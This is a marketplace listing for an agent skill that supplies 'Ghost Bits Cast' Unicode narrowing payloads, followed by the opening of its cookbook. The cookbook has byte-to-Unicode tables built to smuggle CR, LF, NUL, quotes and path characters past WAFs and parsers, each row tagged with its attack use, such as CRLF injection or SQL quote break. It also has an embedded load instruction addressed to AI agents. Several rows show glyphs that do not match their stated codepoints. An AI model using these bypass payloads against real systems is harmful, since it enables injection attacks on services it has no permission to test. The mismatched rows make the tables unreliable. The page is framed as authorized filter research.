Ghost Bits Cast Attack
Generate and reason about Ghost Bits Cast Unicode narrowing payloads, patch matrices, and WAF normalization rules when researching encoding-based filter bypasses.
Overview
ghost-bits-cast-attack is an agent skill for the Ship phase that supplies Ghost Bits Cast Unicode payload tables, generators, and WAF normalization guidance as a deep companion to the main hack-skills primer.
Install
npx skills add https://github.com/yaklang/hack-skills --skill ghost-bits-cast-attackWhat is this skill?
- Complete low-byte → Unicode lookup with Latin Extended-A and CJK candidates per byte
- Documented codepoint rule (high_byte << 8) | low_byte with UTF-16 surrogate avoidance
- Affected-component and patched-version matrix (companion scope beyond main SKILL)
- Ready-to-paste Python and Yaklang payload generators
- Blue-team multi-view normalization pseudocode for WAF rules
- Two Unicode candidates per low byte (Latin Extended-A and CJK) in the complete table
Adoption & trust: 790 installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You understand the Ghost Bits Cast idea but lack the full byte tables, version matrix, and generator snippets needed to test or harden your edge parsers and WAFs.
Who is it for?
Builders doing authorized security research on their own gateways, WAF rules, or parsers who already have the main Ghost Bits Cast SKILL in context.
Skip if: Casual installs seeking a high-level OWASP summary, or any use against systems without explicit permission and a defined scope.
When should I use this skill?
Main Ghost Bits Cast SKILL.md is already in context and you need full lookup tables, generators, patch matrix, or WAF normalization beyond the compact primer.
What do I get? / Deliverables
After loading this companion, your agent can produce spec-aligned payloads, cite patch boundaries, and draft multi-view normalization rules for defensive rule updates.
- Low-byte to Unicode mapping tables
- Python and Yaklang payload snippets
- Blue-team normalization pseudocode for rule drafts
Recommended Skills
Journey fit
How it compares
Companion depth document for a named CVE-class encoding attack—not a general secure-coding linter or dependency audit skill.
Common Questions / FAQ
Who is ghost-bits-cast-attack for?
It is for solo builders and security engineers using coding agents who are hardening or testing their own HTTP, JSON, or SMTP pipelines against Unicode narrowing issues.
When should I use ghost-bits-cast-attack?
Use it in Ship (security) after loading the main SKILL.md when you need payload tables, Yaklang or Python generators, patch matrices, or WAF normalization pseudocode—not for conceptual overviews alone.
Is ghost-bits-cast-attack safe to install?
Check the Security Audits panel on this Prism page for upstream signals; treat payload content as sensitive research material and run only in authorized lab or staging environments.
SKILL.md
READMESKILL.md - Ghost Bits Cast Attack
# Ghost Bits Cast Attack — Payload Cookbook > **AI LOAD INSTRUCTION**: Load this companion when the main > [SKILL.md](./SKILL.md) is already in context AND you need (a) a complete > low-byte → Unicode lookup table beyond the compact one in section 4, > (b) an affected-component / patched-version matrix, (c) ready-to-paste > Python and Yaklang payload generators, or (d) blue-team multi-view > normalization pseudocode for WAF rules. Do NOT load this if the user only > wants the conceptual primer; the main SKILL covers that. --- ## 1. COMPLETE LOW-BYTE TO UNICODE TABLE Two candidates per byte are listed: a Latin Extended-A character (compact in UTF-8, 2 bytes on the wire) and a CJK ideograph (3 bytes on the wire, blends into "Asian text" classifiers). Both round-trip cleanly through any UTF-8 based HTTP / JSON / SMTP transport. For each row, the rule is exactly: ``` codepoint = (high_byte << 8) | low_byte codepoint = (k << 8) | T ``` Avoid `k` in `0xD8..0xDF` (UTF-16 surrogate range) — those are not legal scalar values and will be replaced before reaching the narrowing site. ### 1.1 Control / whitespace bytes | Byte | Char | Latin candidate (k=0x01) | CJK candidate (k=0x96) | Common attack use | |------|------|---------------------------|-------------------------|---------------------------| | 0x00 | NUL | `Ā` U+0100 | `間` U+9600 | path truncation, log nuke | | 0x09 | TAB | `ĉ` U+0109 | `闉` U+9609 | header folding | | 0x0A | LF | `Ċ` U+010A | `閊` U+960A | CRLF injection | | 0x0D | CR | `č` U+010D | `閍` U+960D | CRLF injection | | 0x1B | ESC | `ě` U+011B | `閛` U+961B | terminal escape | ### 1.2 Printable ASCII bytes 0x20–0x3F | Byte | ASCII | Latin | CJK | Notes | |------|-------|----------------------|----------------------|--------------------------------| | 0x20 | SP | `Ġ` U+0120 | `阠` U+9620 | header value break | | 0x21 | `!` | `ġ` U+0121 | `阡` U+9621 | URL fragment | | 0x22 | `"` | `Ģ` U+0122 | `阢` U+9622 | quote break, JSON escape | | 0x23 | `#` | `ģ` U+0123 | `阣` U+9623 | URL fragment, comment | | 0x24 | `$` | `Ĥ` U+0124 | `阤` U+9624 | template syntax | | 0x25 | `%` | `ĥ` U+0125 | `严` U+4E25 | URL encoding prefix | | 0x26 | `&` | `Ħ` U+0126 | `阦` U+9626 | parameter separator | | 0x27 | `'` | `ħ` U+0127 | `阧` U+9627 | SQL quote break | | 0x28 | `(` | `Ĩ` U+0128 | `阨` U+9628 | EL / SpEL syntax | | 0x29 | `)` | `ĩ` U+0129 | `阩` U+9629 | EL / SpEL syntax | | 0x2A | `*` | `Ī` U+012A | `阪` U+962A | wildcards | | 0x2B | `+` | `ī` U+012B | `阫` U+962B | URL space, SQL concat | | 0x2C | `,` | `Ĭ` U+012C | `阬` U+962C | parameter list, multipart | | 0x2D | `-` | `ĭ` U+012D | `阭` U+962D | SQL comment, header | | 0x2E | `.` | `Į` U+012E | `阮` U+962E | path traversal, extension | | 0x2F | `/` | `į` U+012F | `阯` U+962F | path separator | | 0x30 | `0` | `İ` U+0130 | `丰` U+4E30 | hex digit `0` | | 0x31 | `1` | `ı` U+0131 | `失` U+5931 | hex digit `1` | | 0x32 | `2` | `IJ` U+0132 | `甲` U+7532 | hex digit `2` | | 0x33 | `3` | `ij` U+0133 | `耳` U+8033 | hex digit `3` | | 0x34 | `4` | `Ĵ`